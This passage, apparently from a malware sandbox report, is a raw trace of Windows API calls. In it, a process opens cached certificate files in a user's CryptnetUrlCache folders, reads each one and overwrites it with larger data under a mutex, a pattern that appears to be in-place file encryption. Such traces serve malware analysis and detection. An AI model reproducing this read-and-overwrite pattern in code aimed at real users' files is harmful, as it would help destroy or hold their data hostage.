lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpUsedDefaultChar=0x0) returned 65 [0179.476] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x2d7, lpOverlapped=0x0) returned 1 [0179.478] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.478] WriteFile (in: hFile=0x1fc, lpBuffer=0x2876dd8*, nNumberOfBytesToWrite=0x85f, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2876dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x85f, lpOverlapped=0x0) returned 1 [0179.478] CloseHandle (hObject=0x1fc) returned 1 [0179.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.479] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.480] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6e3 [0179.480] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.480] ReleaseMutex (hMutex=0x168) returned 1 [0179.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpUsedDefaultChar=0x0) returned 65 [0179.480] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2d5f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0179.941] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.941] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2d5f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0179.942] CloseHandle (hObject=0x1fc) returned 1 [0179.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.943] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.943] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1cf [0179.943] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.943] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.944] ReleaseMutex (hMutex=0x168) returned 1 [0179.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpUsedDefaultChar=0x0) returned 65 [0179.944] ReadFile (in: hFile=0x1fc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0179.945] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.945] WriteFile (in: hFile=0x1fc, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x757, lpOverlapped=0x0) returned 1 [0179.946] CloseHandle (hObject=0x1fc) returned 1 [0179.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.947] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.947] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd2da [0179.947] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.947] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.947] ReleaseMutex (hMutex=0x168) returned 1 [0179.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0179.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="94308059B57B3142E455B38A6EB92015", lpUsedDefaultChar=0x0) returned 32 [0179.948] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0179.949] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc2da [0179.950] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.951] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc2da [0179.951] WriteFile (in: hFile=0x1fc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.952] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0179.952] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0179.952] CloseHandle (hObject=0x1fc) returned 1 [0179.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x652 [0179.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.954] ReleaseMutex (hMutex=0x168) returned 1 [0179.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpUsedDefaultChar=0x0) returned 65 [0179.954] ReadFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x652, lpOverlapped=0x0) returned 1 [0179.956] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.956] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xbda, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2d5f2d0*=0xbda, lpOverlapped=0x0) returned 1 [0179.957] CloseHandle (hObject=0x1fc) returned 1 [0179.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.958] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.958] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x663 [0179.958] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.958] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.958] ReleaseMutex (hMutex=0x168) returned 1 [0179.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpUsedDefaultChar=0x0) returned 65 [0179.958] ReadFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x663, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x663, lpOverlapped=0x0) returned 1 [0179.960] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.960] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xbeb, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2d5f2d0*=0xbeb, lpOverlapped=0x0) returned 1 [0179.960] CloseHandle (hObject=0x1fc) returned 1 [0179.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.962] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.962] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x124 [0179.962] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.962] ReleaseMutex (hMutex=0x168) returned 1 [0179.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="23B523C9E7746F715D33C6527C18EB9D", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0179.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="23B523C9E7746F715D33C6527C18EB9D", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="23B523C9E7746F715D33C6527C18EB9D", lpUsedDefaultChar=0x0) returned 32 [0179.962] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ec8178, nNumberOfBytesToRead=0x124, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec8178*, lpNumberOfBytesRead=0x2d5f2bc*=0x124, lpOverlapped=0x0) returned 1 [0179.963] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.964] WriteFile (in: hFile=0x1fc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6ac, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6ac, lpOverlapped=0x0) returned 1 [0179.964] CloseHandle (hObject=0x1fc) returned 1 [0179.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.966] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.966] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18e [0179.966] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.966] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.966] ReleaseMutex (hMutex=0x168) returned 1 [0179.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpUsedDefaultChar=0x0) returned 65 [0179.967] ReadFile (in: hFile=0x1fc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2d5f2bc*=0x18e, lpOverlapped=0x0) returned 1 [0179.968] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.968] WriteFile (in: hFile=0x1fc, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x716, lpOverlapped=0x0) returned 1 [0179.968] CloseHandle (hObject=0x1fc) returned 1 [0179.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.969] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.969] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x198 [0179.970] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.970] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.970] ReleaseMutex (hMutex=0x168) returned 1 [0179.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0179.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpUsedDefaultChar=0x0) returned 65 [0179.971] ReadFile (in: hFile=0x1fc, lpBuffer=0x25af228, nNumberOfBytesToRead=0x198, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x2d5f2bc*=0x198, lpOverlapped=0x0) returned 1 [0179.972] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.972] WriteFile (in: hFile=0x1fc, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x720, lpOverlapped=0x0) returned 1 [0179.972] CloseHandle (hObject=0x1fc) returned 1 [0179.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x186 [0179.983] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.984] ReleaseMutex (hMutex=0x168) returned 1 